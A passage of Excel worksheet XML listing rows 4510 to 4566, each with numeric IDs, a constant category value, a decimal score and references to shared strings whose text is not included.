      </c>
      <c r="F4510" t="s">
        <v>5592</v>
      </c>
      <c r="G4510" t="s">
        <v>8914</v>
      </c>
      <c r="H4510" t="s">
        <v>8915</v>
      </c>
    </row>
    <row r="4511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4511" s="1">
        <v>4509</v>
      </c>
      <c r="B4511">
        <v>2905</v>
      </c>
      <c r="C4511">
        <v>2905</v>
      </c>
      <c r="D4511">
        <v>2</v>
      </c>
      <c r="E4511">
        <v>0.84619998931884766</v>
      </c>
      <c r="F4511" t="s">
        <v>5592</v>
      </c>
      <c r="G4511" t="s">
        <v>8916</v>
      </c>
      <c r="H4511" t="s">
        <v>8917</v>
      </c>
    </row>
    <row r="4512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4512" s="1">
        <v>4510</v>
      </c>
      <c r="B4512">
        <v>2861</v>
      </c>
      <c r="C4512">
        <v>2861</v>
      </c>
      <c r="D4512">
        <v>2</v>
      </c>
      <c r="E4512">
        <v>0.43439999222755432</v>
      </c>
      <c r="F4512" t="s">
        <v>5592</v>
      </c>
      <c r="G4512" t="s">
        <v>8918</v>
      </c>
      <c r="H4512" t="s">
        <v>8919</v>
      </c>
    </row>
    <row r="4513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4513" s="1">
        <v>4511</v>
      </c>
      <c r="B4513">
        <v>6659</v>
      </c>
      <c r="C4513">
        <v>6659</v>
      </c>
      <c r="D4513">
        <v>2</v>
      </c>
      <c r="E4513">
        <v>0.98809999227523804</v>
      </c>
      <c r="F4513" t="s">
        <v>5592</v>
      </c>
      <c r="G4513" t="s">
        <v>8920</v>
      </c>
      <c r="H4513" t="s">
        <v>8921</v>
      </c>
    </row>
    <row r="4514" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4514" s="1">
        <v>4512</v>
      </c>
      <c r="B4514">
        <v>2864</v>
      </c>
      <c r="C4514">
        <v>2864</v>
      </c>
      <c r="D4514">
        <v>2</v>
      </c>
      <c r="E4514">
        <v>0.99860000610351563</v>
      </c>
      <c r="F4514" t="s">
        <v>5592</v>
      </c>
      <c r="G4514" t="s">
        <v>8922</v>
      </c>
      <c r="H4514" t="s">
        <v>8923</v>
      </c>
    </row>
    <row r="4515" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4515" s="1">
        <v>4513</v>
      </c>
      <c r="B4515">
        <v>2866</v>
      </c>
      <c r="C4515">
        <v>2866</v>
      </c>
      <c r="D4515">
        <v>2</v>
      </c>
      <c r="E4515">
        <v>0.65420001745223999</v>
      </c>
      <c r="F4515" t="s">
        <v>5592</v>
      </c>
      <c r="G4515" t="s">
        <v>8924</v>
      </c>
      <c r="H4515" t="s">
        <v>8925</v>
      </c>
    </row>
    <row r="4516" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4516" s="1">
        <v>4514</v>
      </c>
      <c r="B4516">
        <v>2874</v>
      </c>
      <c r="C4516">
        <v>2874</v>
      </c>
      <c r="D4516">
        <v>2</v>
      </c>
      <c r="E4516">
        <v>0.6679999828338623</v>
      </c>
      <c r="F4516" t="s">
        <v>5592</v>
      </c>
      <c r="G4516" t="s">
        <v>8926</v>
      </c>
      <c r="H4516" t="s">
        <v>8927</v>
      </c>
    </row>
    <row r="4517" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4517" s="1">
        <v>4515</v>
      </c>
      <c r="B4517">
        <v>6657</v>
      </c>
      <c r="C4517">
        <v>6657</v>
      </c>
      <c r="D4517">
        <v>2</v>
      </c>
      <c r="E4517">
        <v>0.67299997806549072</v>
      </c>
      <c r="F4517" t="s">
        <v>5592</v>
      </c>
      <c r="G4517" t="s">
        <v>8928</v>
      </c>
      <c r="H4517" t="s">
        <v>8929</v>
      </c>
    </row>
    <row r="4518" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4518" s="1">
        <v>4516</v>
      </c>
      <c r="B4518">
        <v>2878</v>
      </c>
      <c r="C4518">
        <v>2878</v>
      </c>
      <c r="D4518">
        <v>2</v>
      </c>
      <c r="E4518">
        <v>0.85809999704360962</v>
      </c>
      <c r="F4518" t="s">
        <v>5592</v>
      </c>
      <c r="G4518" t="s">
        <v>8930</v>
      </c>
      <c r="H4518" t="s">
        <v>8931</v>
      </c>
    </row>
    <row r="4519" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4519" s="1">
        <v>4517</v>
      </c>
      <c r="B4519">
        <v>2879</v>
      </c>
      <c r="C4519">
        <v>2879</v>
      </c>
      <c r="D4519">
        <v>2</v>
      </c>
      <c r="E4519">
        <v>0.72299998998641968</v>
      </c>
      <c r="F4519" t="s">
        <v>5592</v>
      </c>
      <c r="G4519" t="s">
        <v>8932</v>
      </c>
      <c r="H4519" t="s">
        <v>8933</v>
      </c>
    </row>
    <row r="4520" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4520" s="1">
        <v>4518</v>
      </c>
      <c r="B4520">
        <v>2882</v>
      </c>
      <c r="C4520">
        <v>2882</v>
      </c>
      <c r="D4520">
        <v>2</v>
      </c>
      <c r="E4520">
        <v>0.99690002202987671</v>
      </c>
      <c r="F4520" t="s">
        <v>5592</v>
      </c>
      <c r="G4520" t="s">
        <v>8934</v>
      </c>
      <c r="H4520" t="s">
        <v>8935</v>
      </c>
    </row>
    <row r="4521" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4521" s="1">
        <v>4519</v>
      </c>
      <c r="B4521">
        <v>2884</v>
      </c>
      <c r="C4521">
        <v>2884</v>
      </c>
      <c r="D4521">
        <v>2</v>
      </c>
      <c r="E4521">
        <v>0.91710001230239868</v>
      </c>
      <c r="F4521" t="s">
        <v>5592</v>
      </c>
      <c r="G4521" t="s">
        <v>8936</v>
      </c>
      <c r="H4521" t="s">
        <v>8937</v>
      </c>
    </row>
    <row r="4522" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4522" s="1">
        <v>4520</v>
      </c>
      <c r="B4522">
        <v>6654</v>
      </c>
      <c r="C4522">
        <v>6654</v>
      </c>
      <c r="D4522">
        <v>2</v>
      </c>
      <c r="E4522">
        <v>0.98680001497268677</v>
      </c>
      <c r="F4522" t="s">
        <v>5592</v>
      </c>
      <c r="G4522" t="s">
        <v>8938</v>
      </c>
      <c r="H4522" t="s">
        <v>8939</v>
      </c>
    </row>
    <row r="4523" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4523" s="1">
        <v>4521</v>
      </c>
      <c r="B4523">
        <v>6653</v>
      </c>
      <c r="C4523">
        <v>6653</v>
      </c>
      <c r="D4523">
        <v>2</v>
      </c>
      <c r="E4523">
        <v>0.99860000610351563</v>
      </c>
      <c r="F4523" t="s">
        <v>5592</v>
      </c>
      <c r="G4523" t="s">
        <v>8940</v>
      </c>
      <c r="H4523" t="s">
        <v>8941</v>
      </c>
    </row>
    <row r="4524" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4524" s="1">
        <v>4522</v>
      </c>
      <c r="B4524">
        <v>6649</v>
      </c>
      <c r="C4524">
        <v>6649</v>
      </c>
      <c r="D4524">
        <v>2</v>
      </c>
      <c r="E4524">
        <v>0.99800002574920654</v>
      </c>
      <c r="F4524" t="s">
        <v>5592</v>
      </c>
      <c r="G4524" t="s">
        <v>8942</v>
      </c>
      <c r="H4524" t="s">
        <v>8943</v>
      </c>
    </row>
    <row r="4525" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4525" s="1">
        <v>4523</v>
      </c>
      <c r="B4525">
        <v>6648</v>
      </c>
      <c r="C4525">
        <v>6648</v>
      </c>
      <c r="D4525">
        <v>2</v>
      </c>
      <c r="E4525">
        <v>0.99529999494552612</v>
      </c>
      <c r="F4525" t="s">
        <v>5592</v>
      </c>
      <c r="G4525" t="s">
        <v>8944</v>
      </c>
      <c r="H4525" t="s">
        <v>8945</v>
      </c>
    </row>
    <row r="4526" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4526" s="1">
        <v>4524</v>
      </c>
      <c r="B4526">
        <v>6647</v>
      </c>
      <c r="C4526">
        <v>6647</v>
      </c>
      <c r="D4526">
        <v>2</v>
      </c>
      <c r="E4526">
        <v>0.99580001831054688</v>
      </c>
      <c r="F4526" t="s">
        <v>5592</v>
      </c>
      <c r="G4526" t="s">
        <v>8946</v>
      </c>
      <c r="H4526" t="s">
        <v>8947</v>
      </c>
    </row>
    <row r="4527" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4527" s="1">
        <v>4525</v>
      </c>
      <c r="B4527">
        <v>6646</v>
      </c>
      <c r="C4527">
        <v>6646</v>
      </c>
      <c r="D4527">
        <v>2</v>
      </c>
      <c r="E4527">
        <v>0.99949997663497925</v>
      </c>
      <c r="F4527" t="s">
        <v>5592</v>
      </c>
      <c r="G4527" t="s">
        <v>8948</v>
      </c>
      <c r="H4527" t="s">
        <v>8949</v>
      </c>
    </row>
    <row r="4528" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4528" s="1">
        <v>4526</v>
      </c>
      <c r="B4528">
        <v>2899</v>
      </c>
      <c r="C4528">
        <v>2899</v>
      </c>
      <c r="D4528">
        <v>2</v>
      </c>
      <c r="E4528">
        <v>0.52160000801086426</v>
      </c>
      <c r="F4528" t="s">
        <v>5592</v>
      </c>
      <c r="G4528" t="s">
        <v>8950</v>
      </c>
      <c r="H4528" t="s">
        <v>8951</v>
      </c>
    </row>
    <row r="4529" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4529" s="1">
        <v>4527</v>
      </c>
      <c r="B4529">
        <v>2900</v>
      </c>
      <c r="C4529">
        <v>2900</v>
      </c>
      <c r="D4529">
        <v>2</v>
      </c>
      <c r="E4529">
        <v>0.66579997539520264</v>
      </c>
      <c r="F4529" t="s">
        <v>5592</v>
      </c>
      <c r="G4529" t="s">
        <v>8952</v>
      </c>
      <c r="H4529" t="s">
        <v>8953</v>
      </c>
    </row>
    <row r="4530" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4530" s="1">
        <v>4528</v>
      </c>
      <c r="B4530">
        <v>2901</v>
      </c>
      <c r="C4530">
        <v>2901</v>
      </c>
      <c r="D4530">
        <v>2</v>
      </c>
      <c r="E4530">
        <v>0.74779999256134033</v>
      </c>
      <c r="F4530" t="s">
        <v>5592</v>
      </c>
      <c r="G4530" t="s">
        <v>8954</v>
      </c>
      <c r="H4530" t="s">
        <v>8955</v>
      </c>
    </row>
    <row r="4531" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4531" s="1">
        <v>4529</v>
      </c>
      <c r="B4531">
        <v>2903</v>
      </c>
      <c r="C4531">
        <v>2903</v>
      </c>
      <c r="D4531">
        <v>2</v>
      </c>
      <c r="E4531">
        <v>0.59299999475479126</v>
      </c>
      <c r="F4531" t="s">
        <v>5592</v>
      </c>
      <c r="G4531" t="s">
        <v>8956</v>
      </c>
      <c r="H4531" t="s">
        <v>8957</v>
      </c>
    </row>
    <row r="4532" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4532" s="1">
        <v>4530</v>
      </c>
      <c r="B4532">
        <v>2904</v>
      </c>
      <c r="C4532">
        <v>2904</v>
      </c>
      <c r="D4532">
        <v>2</v>
      </c>
      <c r="E4532">
        <v>0.94870001077651978</v>
      </c>
      <c r="F4532" t="s">
        <v>5592</v>
      </c>
      <c r="G4532" t="s">
        <v>8958</v>
      </c>
      <c r="H4532" t="s">
        <v>8959</v>
      </c>
    </row>
    <row r="4533" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4533" s="1">
        <v>4531</v>
      </c>
      <c r="B4533">
        <v>2906</v>
      </c>
      <c r="C4533">
        <v>2906</v>
      </c>
      <c r="D4533">
        <v>2</v>
      </c>
      <c r="E4533">
        <v>0.91289997100830078</v>
      </c>
      <c r="F4533" t="s">
        <v>5592</v>
      </c>
      <c r="G4533" t="s">
        <v>8960</v>
      </c>
      <c r="H4533" t="s">
        <v>8961</v>
      </c>
    </row>
    <row r="4534" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4534" s="1">
        <v>4532</v>
      </c>
      <c r="B4534">
        <v>6591</v>
      </c>
      <c r="C4534">
        <v>6591</v>
      </c>
      <c r="D4534">
        <v>2</v>
      </c>
      <c r="E4534">
        <v>0.99889999628067017</v>
      </c>
      <c r="F4534" t="s">
        <v>5592</v>
      </c>
      <c r="G4534" t="s">
        <v>8962</v>
      </c>
      <c r="H4534" t="s">
        <v>8963</v>
      </c>
    </row>
    <row r="4535" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4535" s="1">
        <v>4533</v>
      </c>
      <c r="B4535">
        <v>2982</v>
      </c>
      <c r="C4535">
        <v>2982</v>
      </c>
      <c r="D4535">
        <v>2</v>
      </c>
      <c r="E4535">
        <v>0.60790002346038818</v>
      </c>
      <c r="F4535" t="s">
        <v>5592</v>
      </c>
      <c r="G4535" t="s">
        <v>8964</v>
      </c>
      <c r="H4535" t="s">
        <v>8965</v>
      </c>
    </row>
    <row r="4536" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4536" s="1">
        <v>4534</v>
      </c>
      <c r="B4536">
        <v>2985</v>
      </c>
      <c r="C4536">
        <v>2985</v>
      </c>
      <c r="D4536">
        <v>2</v>
      </c>
      <c r="E4536">
        <v>0.97539997100830078</v>
      </c>
      <c r="F4536" t="s">
        <v>5592</v>
      </c>
      <c r="G4536" t="s">
        <v>8966</v>
      </c>
      <c r="H4536" t="s">
        <v>8967</v>
      </c>
    </row>
    <row r="4537" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4537" s="1">
        <v>4535</v>
      </c>
      <c r="B4537">
        <v>3040</v>
      </c>
      <c r="C4537">
        <v>3040</v>
      </c>
      <c r="D4537">
        <v>2</v>
      </c>
      <c r="E4537">
        <v>0.3783000111579895</v>
      </c>
      <c r="F4537" t="s">
        <v>5592</v>
      </c>
      <c r="G4537" t="s">
        <v>8968</v>
      </c>
      <c r="H4537" t="s">
        <v>8969</v>
      </c>
    </row>
    <row r="4538" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4538" s="1">
        <v>4536</v>
      </c>
      <c r="B4538">
        <v>3042</v>
      </c>
      <c r="C4538">
        <v>3042</v>
      </c>
      <c r="D4538">
        <v>2</v>
      </c>
      <c r="E4538">
        <v>0.63990002870559692</v>
      </c>
      <c r="F4538" t="s">
        <v>5592</v>
      </c>
      <c r="G4538" t="s">
        <v>8970</v>
      </c>
      <c r="H4538" t="s">
        <v>8971</v>
      </c>
    </row>
    <row r="4539" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4539" s="1">
        <v>4537</v>
      </c>
      <c r="B4539">
        <v>6571</v>
      </c>
      <c r="C4539">
        <v>6571</v>
      </c>
      <c r="D4539">
        <v>2</v>
      </c>
      <c r="E4539">
        <v>0.99379998445510864</v>
      </c>
      <c r="F4539" t="s">
        <v>5592</v>
      </c>
      <c r="G4539" t="s">
        <v>8972</v>
      </c>
      <c r="H4539" t="s">
        <v>8973</v>
      </c>
    </row>
    <row r="4540" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4540" s="1">
        <v>4538</v>
      </c>
      <c r="B4540">
        <v>3044</v>
      </c>
      <c r="C4540">
        <v>3044</v>
      </c>
      <c r="D4540">
        <v>2</v>
      </c>
      <c r="E4540">
        <v>0.98900002241134644</v>
      </c>
      <c r="F4540" t="s">
        <v>5592</v>
      </c>
      <c r="G4540" t="s">
        <v>8974</v>
      </c>
      <c r="H4540" t="s">
        <v>8975</v>
      </c>
    </row>
    <row r="4541" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4541" s="1">
        <v>4539</v>
      </c>
      <c r="B4541">
        <v>3045</v>
      </c>
      <c r="C4541">
        <v>3045</v>
      </c>
      <c r="D4541">
        <v>2</v>
      </c>
      <c r="E4541">
        <v>0.43680000305175781</v>
      </c>
      <c r="F4541" t="s">
        <v>5592</v>
      </c>
      <c r="G4541" t="s">
        <v>8976</v>
      </c>
      <c r="H4541" t="s">
        <v>8977</v>
      </c>
    </row>
    <row r="4542" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4542" s="1">
        <v>4540</v>
      </c>
      <c r="B4542">
        <v>6570</v>
      </c>
      <c r="C4542">
        <v>6570</v>
      </c>
      <c r="D4542">
        <v>2</v>
      </c>
      <c r="E4542">
        <v>0.96009999513626099</v>
      </c>
      <c r="F4542" t="s">
        <v>5592</v>
      </c>
      <c r="G4542" t="s">
        <v>8978</v>
      </c>
      <c r="H4542" t="s">
        <v>8979</v>
      </c>
    </row>
    <row r="4543" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4543" s="1">
        <v>4541</v>
      </c>
      <c r="B4543">
        <v>3049</v>
      </c>
      <c r="C4543">
        <v>3049</v>
      </c>
      <c r="D4543">
        <v>2</v>
      </c>
      <c r="E4543">
        <v>0.5242999792098999</v>
      </c>
      <c r="F4543" t="s">
        <v>5592</v>
      </c>
      <c r="G4543" t="s">
        <v>8980</v>
      </c>
      <c r="H4543" t="s">
        <v>8981</v>
      </c>
    </row>
    <row r="4544" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4544" s="1">
        <v>4542</v>
      </c>
      <c r="B4544">
        <v>3050</v>
      </c>
      <c r="C4544">
        <v>3050</v>
      </c>
      <c r="D4544">
        <v>2</v>
      </c>
      <c r="E4544">
        <v>0.97070002555847168</v>
      </c>
      <c r="F4544" t="s">
        <v>5592</v>
      </c>
      <c r="G4544" t="s">
        <v>8982</v>
      </c>
      <c r="H4544" t="s">
        <v>8983</v>
      </c>
    </row>
    <row r="4545" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4545" s="1">
        <v>4543</v>
      </c>
      <c r="B4545">
        <v>3051</v>
      </c>
      <c r="C4545">
        <v>3051</v>
      </c>
      <c r="D4545">
        <v>2</v>
      </c>
      <c r="E4545">
        <v>0.60409998893737793</v>
      </c>
      <c r="F4545" t="s">
        <v>5592</v>
      </c>
      <c r="G4545" t="s">
        <v>8984</v>
      </c>
      <c r="H4545" t="s">
        <v>8985</v>
      </c>
    </row>
    <row r="4546" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4546" s="1">
        <v>4544</v>
      </c>
      <c r="B4546">
        <v>6567</v>
      </c>
      <c r="C4546">
        <v>6567</v>
      </c>
      <c r="D4546">
        <v>2</v>
      </c>
      <c r="E4546">
        <v>0.99919998645782471</v>
      </c>
      <c r="F4546" t="s">
        <v>5592</v>
      </c>
      <c r="G4546" t="s">
        <v>8986</v>
      </c>
      <c r="H4546" t="s">
        <v>8987</v>
      </c>
    </row>
    <row r="4547" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4547" s="1">
        <v>4545</v>
      </c>
      <c r="B4547">
        <v>3055</v>
      </c>
      <c r="C4547">
        <v>3055</v>
      </c>
      <c r="D4547">
        <v>2</v>
      </c>
      <c r="E4547">
        <v>0.99470001459121704</v>
      </c>
      <c r="F4547" t="s">
        <v>5592</v>
      </c>
      <c r="G4547" t="s">
        <v>8988</v>
      </c>
      <c r="H4547" t="s">
        <v>8989</v>
      </c>
    </row>
    <row r="4548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4548" s="1">
        <v>4546</v>
      </c>
      <c r="B4548">
        <v>3057</v>
      </c>
      <c r="C4548">
        <v>3057</v>
      </c>
      <c r="D4548">
        <v>2</v>
      </c>
      <c r="E4548">
        <v>0.99809998273849487</v>
      </c>
      <c r="F4548" t="s">
        <v>5592</v>
      </c>
      <c r="G4548" t="s">
        <v>8990</v>
      </c>
      <c r="H4548" t="s">
        <v>8991</v>
      </c>
    </row>
    <row r="4549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4549" s="1">
        <v>4547</v>
      </c>
      <c r="B4549">
        <v>3058</v>
      </c>
      <c r="C4549">
        <v>3058</v>
      </c>
      <c r="D4549">
        <v>2</v>
      </c>
      <c r="E4549">
        <v>0.99559998512268066</v>
      </c>
      <c r="F4549" t="s">
        <v>5592</v>
      </c>
      <c r="G4549" t="s">
        <v>8992</v>
      </c>
      <c r="H4549" t="s">
        <v>8993</v>
      </c>
    </row>
    <row r="4550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4550" s="1">
        <v>4548</v>
      </c>
      <c r="B4550">
        <v>3059</v>
      </c>
      <c r="C4550">
        <v>3059</v>
      </c>
      <c r="D4550">
        <v>2</v>
      </c>
      <c r="E4550">
        <v>0.97500002384185791</v>
      </c>
      <c r="F4550" t="s">
        <v>5592</v>
      </c>
      <c r="G4550" t="s">
        <v>8994</v>
      </c>
      <c r="H4550" t="s">
        <v>8995</v>
      </c>
    </row>
    <row r="4551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4551" s="1">
        <v>4549</v>
      </c>
      <c r="B4551">
        <v>3060</v>
      </c>
      <c r="C4551">
        <v>3060</v>
      </c>
      <c r="D4551">
        <v>2</v>
      </c>
      <c r="E4551">
        <v>0.96869999170303345</v>
      </c>
      <c r="F4551" t="s">
        <v>5592</v>
      </c>
      <c r="G4551" t="s">
        <v>8996</v>
      </c>
      <c r="H4551" t="s">
        <v>8997</v>
      </c>
    </row>
    <row r="4552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4552" s="1">
        <v>4550</v>
      </c>
      <c r="B4552">
        <v>3061</v>
      </c>
      <c r="C4552">
        <v>3061</v>
      </c>
      <c r="D4552">
        <v>2</v>
      </c>
      <c r="E4552">
        <v>0.99379998445510864</v>
      </c>
      <c r="F4552" t="s">
        <v>5592</v>
      </c>
      <c r="G4552" t="s">
        <v>8998</v>
      </c>
      <c r="H4552" t="s">
        <v>8999</v>
      </c>
    </row>
    <row r="4553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4553" s="1">
        <v>4551</v>
      </c>
      <c r="B4553">
        <v>6566</v>
      </c>
      <c r="C4553">
        <v>6566</v>
      </c>
      <c r="D4553">
        <v>2</v>
      </c>
      <c r="E4553">
        <v>0.64630001783370972</v>
      </c>
      <c r="F4553" t="s">
        <v>5592</v>
      </c>
      <c r="G4553" t="s">
        <v>9000</v>
      </c>
      <c r="H4553" t="s">
        <v>9001</v>
      </c>
    </row>
    <row r="4554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4554" s="1">
        <v>4552</v>
      </c>
      <c r="B4554">
        <v>3065</v>
      </c>
      <c r="C4554">
        <v>3065</v>
      </c>
      <c r="D4554">
        <v>2</v>
      </c>
      <c r="E4554">
        <v>0.78609997034072876</v>
      </c>
      <c r="F4554" t="s">
        <v>5592</v>
      </c>
      <c r="G4554" t="s">
        <v>9002</v>
      </c>
      <c r="H4554" t="s">
        <v>9003</v>
      </c>
    </row>
    <row r="4555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4555" s="1">
        <v>4553</v>
      </c>
      <c r="B4555">
        <v>3073</v>
      </c>
      <c r="C4555">
        <v>3073</v>
      </c>
      <c r="D4555">
        <v>2</v>
      </c>
      <c r="E4555">
        <v>0.70200002193450928</v>
      </c>
      <c r="F4555" t="s">
        <v>5592</v>
      </c>
      <c r="G4555" t="s">
        <v>9004</v>
      </c>
      <c r="H4555" t="s">
        <v>9005</v>
      </c>
    </row>
    <row r="4556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4556" s="1">
        <v>4554</v>
      </c>
      <c r="B4556">
        <v>3075</v>
      </c>
      <c r="C4556">
        <v>3075</v>
      </c>
      <c r="D4556">
        <v>2</v>
      </c>
      <c r="E4556">
        <v>0.42080000042915339</v>
      </c>
      <c r="F4556" t="s">
        <v>5592</v>
      </c>
      <c r="G4556" t="s">
        <v>9006</v>
      </c>
      <c r="H4556" t="s">
        <v>9007</v>
      </c>
    </row>
    <row r="4557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4557" s="1">
        <v>4555</v>
      </c>
      <c r="B4557">
        <v>3076</v>
      </c>
      <c r="C4557">
        <v>3076</v>
      </c>
      <c r="D4557">
        <v>2</v>
      </c>
      <c r="E4557">
        <v>0.61309999227523804</v>
      </c>
      <c r="F4557" t="s">
        <v>5592</v>
      </c>
      <c r="G4557" t="s">
        <v>9008</v>
      </c>
      <c r="H4557" t="s">
        <v>9009</v>
      </c>
    </row>
    <row r="4558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4558" s="1">
        <v>4556</v>
      </c>
      <c r="B4558">
        <v>3038</v>
      </c>
      <c r="C4558">
        <v>3038</v>
      </c>
      <c r="D4558">
        <v>2</v>
      </c>
      <c r="E4558">
        <v>0.55989998579025269</v>
      </c>
      <c r="F4558" t="s">
        <v>5592</v>
      </c>
      <c r="G4558" t="s">
        <v>9010</v>
      </c>
      <c r="H4558" t="s">
        <v>9011</v>
      </c>
    </row>
    <row r="4559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4559" s="1">
        <v>4557</v>
      </c>
      <c r="B4559">
        <v>3037</v>
      </c>
      <c r="C4559">
        <v>3037</v>
      </c>
      <c r="D4559">
        <v>2</v>
      </c>
      <c r="E4559">
        <v>0.51969999074935913</v>
      </c>
      <c r="F4559" t="s">
        <v>5592</v>
      </c>
      <c r="G4559" t="s">
        <v>9012</v>
      </c>
      <c r="H4559" t="s">
        <v>9013</v>
      </c>
    </row>
    <row r="4560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4560" s="1">
        <v>4558</v>
      </c>
      <c r="B4560">
        <v>6572</v>
      </c>
      <c r="C4560">
        <v>6572</v>
      </c>
      <c r="D4560">
        <v>2</v>
      </c>
      <c r="E4560">
        <v>0.93080002069473267</v>
      </c>
      <c r="F4560" t="s">
        <v>5592</v>
      </c>
      <c r="G4560" t="s">
        <v>9014</v>
      </c>
      <c r="H4560" t="s">
        <v>9015</v>
      </c>
    </row>
    <row r="4561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4561" s="1">
        <v>4559</v>
      </c>
      <c r="B4561">
        <v>3033</v>
      </c>
      <c r="C4561">
        <v>3033</v>
      </c>
      <c r="D4561">
        <v>2</v>
      </c>
      <c r="E4561">
        <v>0.89600002765655518</v>
      </c>
      <c r="F4561" t="s">
        <v>5592</v>
      </c>
      <c r="G4561" t="s">
        <v>9016</v>
      </c>
      <c r="H4561" t="s">
        <v>9017</v>
      </c>
    </row>
    <row r="4562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4562" s="1">
        <v>4560</v>
      </c>
      <c r="B4562">
        <v>6590</v>
      </c>
      <c r="C4562">
        <v>6590</v>
      </c>
      <c r="D4562">
        <v>2</v>
      </c>
      <c r="E4562">
        <v>0.60500001907348633</v>
      </c>
      <c r="F4562" t="s">
        <v>5592</v>
      </c>
      <c r="G4562" t="s">
        <v>9018</v>
      </c>
      <c r="H4562" t="s">
        <v>9019</v>
      </c>
    </row>
    <row r="4563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4563" s="1">
        <v>4561</v>
      </c>
      <c r="B4563">
        <v>2987</v>
      </c>
      <c r="C4563">
        <v>2987</v>
      </c>
      <c r="D4563">
        <v>2</v>
      </c>
      <c r="E4563">
        <v>0.9122999906539917</v>
      </c>
      <c r="F4563" t="s">
        <v>5592</v>
      </c>
      <c r="G4563" t="s">
        <v>9020</v>
      </c>
      <c r="H4563" t="s">
        <v>9021</v>
      </c>
    </row>
    <row r="4564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4564" s="1">
        <v>4562</v>
      </c>
      <c r="B4564">
        <v>2988</v>
      </c>
      <c r="C4564">
        <v>2988</v>
      </c>
      <c r="D4564">
        <v>2</v>
      </c>
      <c r="E4564">
        <v>0.55180001258850098</v>
      </c>
      <c r="F4564" t="s">
        <v>5592</v>
      </c>
      <c r="G4564" t="s">
        <v>9022</v>
      </c>
      <c r="H4564" t="s">
        <v>9023</v>
      </c>
    </row>
    <row r="4565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4565" s="1">
        <v>4563</v>
      </c>
      <c r="B4565">
        <v>6587</v>
      </c>
      <c r="C4565">
        <v>6587</v>
      </c>
      <c r="D4565">
        <v>2</v>
      </c>
      <c r="E4565">
        <v>0.92259997129440308</v>
      </c>
      <c r="F4565" t="s">
        <v>5592</v>
      </c>
      <c r="G4565" t="s">
        <v>9024</v>
      </c>
      <c r="H4565" t="s">
        <v>9025</v>
      </c>
    </row>
    <row r="4566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4566" s="1">
        <v>4564</v>
      </c>
      <c r="B4566">
        <v>6583</v>
      </c>
      <c r="C4566">
        <v>6583</v>
      </c>
      <c r="D4566">
        <v>2</v>
      </c>
      <c r="E4566">
        <v>0.69889998435974121</v>
      </c>
      <c r="F4566" t="s">
        <v>5592</v>
      </c>
      <c r="G4566" t="s">
        <v>9026</v>
      </c>
      <c r="H4566" t="s">
        <v>9027</v>
      </c>
    </row>
    <row r="4567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4567" s="1">
        <v>4565</v>
      </c>
      <c r="B4567">
        <v>2999</v>
      </c>
      <c r="C4567">
        <v>2999</v>
      </c>
      <c r="D4567">
        <v>2</v>
      </c>
      <c r="E4567">
        <v>0.67400002479553223</v>
      </c>
      <c r="F4567" t="s">
        <v>5592</v>
      </c>
      <c r="G4567" t="s">
        <v>9028</v>
      </c>
      <c r="H4567" t="s">
        <v>9029</v>
      </c>
    </row>
    <row r="4568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A4568" s="1">
        <v>4566</v>
      </c>
      <c r="B4568">
        <v>3000</v>
      </c>
      <c r="C4568">
        <v>3000</v>
      </c>
      <c r="D4568">
        <v>2</v>
      </c>
      <c r="E4568">
        <v>0.72759997844696045</v>
      </c>
      <c r="F4568" t="s">
        <v>5592</v>
      </c>
      <c r="G4568" t="s">
        <v>9030</v>
      </c>
      <c r="H4568" t="s">
        <v>9031</v>
      </c>
